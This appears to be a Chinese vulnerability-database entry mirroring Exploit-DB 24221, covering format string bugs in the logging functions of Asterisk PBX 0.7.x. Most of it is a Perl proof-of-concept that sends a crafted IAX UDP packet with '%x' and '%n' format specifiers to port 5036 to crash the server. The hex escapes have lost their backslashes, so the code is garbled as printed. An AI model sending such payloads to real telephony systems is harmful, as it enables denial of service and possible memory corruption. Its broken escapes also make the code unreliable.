Asterisk PBX 0.7.x – Multiple Logging Format String Vulnerabilities

Asterisk PBX 0.7.x – Multiple Logging Format String Vulnerabilities

漏洞ID 1054503 漏洞类型
发布时间 2004-06-18 更新时间 2004-06-18
图片[1]-Asterisk PBX 0.7.x – Multiple Logging Format String Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-Asterisk PBX 0.7.x – Multiple Logging Format String Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24221
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10569/info

It is reported that Asterisk is susceptible to format string vulnerabilities in its logging functions.

An attacker may use these vulnerabilities to corrupt memory, and read or write arbitrary memory. Remote code execution is likely possible.

Due to the nature of these vulnerabilities, there may exist many different avenues of attack. Anything that can potentially call the logging functions with user-supplied data is vulnerable.

Versions 0.7.0 through to 0.7.2 are reported vulnerable.

#!/usr/bin/perl
#
# Asterisk 0.7.2 Linux PBX Remote Format string DoS (PoC)
#
# Feb 29 22:58:08 NOTICE[27151280]: Rejected connect attempt from 127.0.0.1, request
# 'exten=;callerid=;dnid=;context=;username=ce0ca0;language=;formats=;version=;}'

#
# kfinisterre[at]secnetops[dot]com - Copyright Secure Network Operations.
#

use IO::Socket::INET;

$sock=new IO::Socket::INET->new(PeerPort=>5036, Proto=>'udp', PeerAddr=>'localhost');
#$malpayload = "%.10d.";
#$malpayload .= "%.10d"; # add 6 to length
#$malpayload .="%n"; # write to the third address... we
have control of $esi
$malpayload = "AAAABBBB" . "%x." x 25;
$malpayload .="x3b";

$payload = "xa3x7dxffxffx00x00x00x01x00x00x06x01x65x78x74x65x6ex3dx3b" . # extern=;
"x63x61x6cx6cx65x72x69x64x3dx3b" . # callerid=;
"x64x6ex69x64x3dx3b" . # dnid=;
"x63x6fx6ex74x65x78x74x3dx3b" . # context=;
"$malpayload" .
"x75x73x65x72x6ex61x6dx65x3d" . # username=;
"x6cx61x6ex67x75x61x67x65x3dx3b" . # language=;
"x66x6fx72x6dx61x74x73x3dx3b" . # formats=;
"x76x65x72x73x69x6fx6ex3dx3b" . # version=;
"xa3x7dxffxffx00x00x00x15x00x01x06x0b"; # end of payload

$sock->send($payload);
close($sock);

相关推荐: Aplio Internet Phone Arbitrary Command Execution Vulnerability

Aplio Internet Phone Arbitrary Command Execution Vulnerability 漏洞ID 1103761 漏洞类型 Input Validation Error 发布时间 2000-10-06 更新时间 2000-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享